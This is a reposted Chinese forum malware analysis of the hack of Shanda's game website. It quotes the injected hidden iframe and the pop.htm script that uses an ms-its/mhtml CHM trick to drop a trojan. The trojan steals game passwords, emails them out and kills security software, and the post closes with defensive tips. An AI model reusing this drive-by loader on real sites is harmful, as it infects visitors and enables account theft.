发新话题
打印

[转载]分析盛大网络被黑

[转载]分析盛大网络被黑

本文作者:By YtT [HB]

7.16龙哥给了我一个rar的压缩包,说是盛大给黑的截图以及一些相关的东西,
叫我分析一下,我见也没事做,也就接下来这个任务了。
解压后的文件有4个,分别是poptang.compop.htm,盛大.bmp 盛大1.htm,pop.chm
bmp的是抓图,先看看盛大1.htm,猜了一下,去问问了龙,证实是骇客们入侵了盛大的
网站后,估计是利用asp木马来编辑文件,在网页中插入
<td align="center"><strong><iframe src="pop.htm" width="0" height="0"><font color="#FF0000">

这样,只要受害者一访问网站,就会自动去访问pop.htm,我们来看看pop.htm
pop.htm已经给改名为poptang.compop.htm了,主要的代码如下


<textarea id="code" style="display:none;">
<object data="ms-its:mhtml:file://c:\foo.mht!${path}/pop.chm::/test.htm" type="text/x-scriptlet"></object>
</textarea>
<script language="javascript">
document.write(code.value.replace(/\${path}/g,location.href.substring(0,location.href.indexOf(&#39;pop.htm&#39;))));
</script>

主要是运行下载了的pop.chm,而且这个pop.chm很明显,就是最近颇为流行的chm木马了,我打开那个CHM文件,打开这个文件的下一个
页面,立刻提示下载一个名为test.exe的文件,呵呵,估计这个才是我们今天重点要分析的对象,用侦壳工具查看了一下,发现不出是
什么加的壳,只好用winhex打开看看,不过却发现有aspack字样,相信各位也和我一样以为是aspack的壳吧,没想到测试了几个专用的
脱壳工具后,才发现不行,只好作罢。正在发愁的时候刚好见到好友kcarhc上来了,也正是黑基以前的血紫狂刀,叫他帮我脱一下壳,
没想到他却说是telock加的壳,晕死了。叫他脱完壳发给我,没想到他顺手也帮我反汇编了,郁闷,我还大显身手一次。
直接说出那个木马的功能吧,盗密码是肯定的了,好想是用service@263.net这个e-mail来发送,主题为 录取通知书,该木马具有以下功能

记录受害者的电脑的传奇的:
传奇登录
登录
发送时间
服务器
附加信息
计算机名
角色
密码
物品信息
用户名
区域
还会自动搜索一下的安全软件来终止它。
噬菌
天网防火墙个人版
天网防火墙企业版
木马克星

的确够狠,不过功能却是一般,下面我们说说如何防止这类木马。
1,不要以为装个杀毒软件就没事了,我可是把那个木马下载后,以及就算脱壳
用诺顿来扫描都提示没有发现病毒,我个人就比较建议或者推荐要及时更新windows的补丁
2,打开注册表,把HKEY_CURRENT_USER\software\microsofr\windows\current version\internetsettings\zone\0的1004项的值由
原来的0改成16进制的3.
qq310926是我唯一用号,除此之外有其他号码号自称邪八冰血封情,则非本人。

TOP

发新话题